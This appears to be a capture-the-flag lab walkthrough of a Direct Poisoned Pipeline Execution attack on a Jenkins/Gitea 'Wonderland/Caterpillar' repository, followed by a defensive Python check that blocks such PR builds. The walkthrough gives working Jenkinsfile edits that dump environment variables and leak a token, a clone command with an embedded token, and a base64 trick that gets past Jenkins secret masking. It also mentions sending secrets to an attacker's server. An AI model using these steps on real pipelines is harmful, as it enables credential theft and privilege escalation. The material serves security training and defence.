Create a pull request originating from a fork and execute a Direct-PPE attack against the Wonderland/Caterpillar repository to elevate your privileges and steal the flag2 secret.

- Fork the Wonderland/Caterpillar repository.
- Modify the Jenkinsfile in the fork so that it prints the environment variables to the console output, or sends them to a server you control:

  ```groovy
  // Replaces the original stage body: `env` dumps every variable of the build process
  stage('Install_Requirements') { steps { sh ''' env ''' } }
  ```

- Create a pull request from the fork into the main branch of the original repository. The wonderland-caterpillar-test Jenkins pipeline, originally intended to run tests against the repository code, will be executed.
- Access the console output of the executed job to get the gitea_token. This token has Write permission on the repository, which effectively allows you to elevate your privileges against the repo.
- Clone the repository using the token:

  ```shell
  git clone http://a644940c92efe2d1876e16a5d29e6c6d7e199b68@localhost:3000/Wonderland/caterpillar.git
  ```

- Modify the Jenkinsfile to load the flag2 secret as an environment variable and print it to the console output, or send it to a remote host:

  ```groovy
  // Binds the stored flag2 credential to TOKEN; base64 sidesteps Jenkins' console masking of the raw value
  stage('deploy') { steps { withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'flag2', passwordVariable: 'TOKEN')]) { sh 'echo $TOKEN | base64' } } }
  ```

- Push the modified Jenkinsfile to the main branch in the repository. The wonderland-caterpillar-prod pipeline will be triggered automatically.
- Access the console output of the executed job to get the encoded secret.
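The two conditions this walkthrough relies on, a fork PR that rewrites the Jenkinsfile and an `sh` step that dumps the environment where injected credentials live, can both be checked before a PR build is allowed to run. The Python below is an added example, not part of this walkthrough or the lab's own code; the Gitea-style webhook field layout, the sample payload and the sample Jenkinsfile are constructed assumptions.

```python
import re

# Files whose modification means the PR rewrites the pipeline definition itself.
PIPELINE_FILES = {"Jenkinsfile"}
# Shell step marker, and commands that dump the whole process environment,
# which is where Jenkins places injected credentials such as gitea_token.
SH_STEP = re.compile(r"\bsh\b")
ENV_DUMP = re.compile(r"\b(env|printenv)\b|/proc/self/environ")

# Constructed Gitea-style pull_request webhook payload (field layout assumed).
SAMPLE_EVENT = {
    "action": "opened",
    "pull_request": {
        "head": {"repo": {"full_name": "contributor/caterpillar"}},
        "base": {"repo": {"full_name": "Wonderland/caterpillar"}},
    },
}
# Constructed Jenkinsfile as it would look after the fork's modification.
SAMPLE_JENKINSFILE = """pipeline {
  stages {
    stage('Install_Requirements') { steps { sh ''' env ''' } }
  }
}"""

def is_fork_pr(event):
    """True when the PR head lives in a different repository than the base."""
    pr = event["pull_request"]
    return pr["head"]["repo"]["full_name"] != pr["base"]["repo"]["full_name"]

def pipeline_files_changed(changed_files):
    """Pipeline definition files touched by the PR, matched by basename."""
    return sorted(f for f in changed_files if f.rsplit("/", 1)[-1] in PIPELINE_FILES)

def suspicious_steps(jenkinsfile_text):
    """1-based line numbers of sh steps that dump the environment."""
    return [n for n, line in enumerate(jenkinsfile_text.splitlines(), 1)
            if SH_STEP.search(line) and ENV_DUMP.search(line)]

def gate_pr_build(event, changed_files, jenkinsfile_text):
    """Return (allow, reasons). A fork PR that edits the Jenkinsfile must not run its
    own pipeline code: build it from the trusted base-branch Jenkinsfile, bind no credentials."""
    reasons = []
    changed = pipeline_files_changed(changed_files)
    if is_fork_pr(event) and changed:
        reasons.append("fork PR modifies pipeline definition: " + ", ".join(changed))
    hits = suspicious_steps(jenkinsfile_text)
    if hits:
        reasons.append("environment dump in sh step at line(s) %s" % hits)
    return (not reasons, reasons)
```

Wire `gate_pr_build` into the webhook handler that triggers wonderland-caterpillar-test, and refuse or strip credentials from any build it rejects.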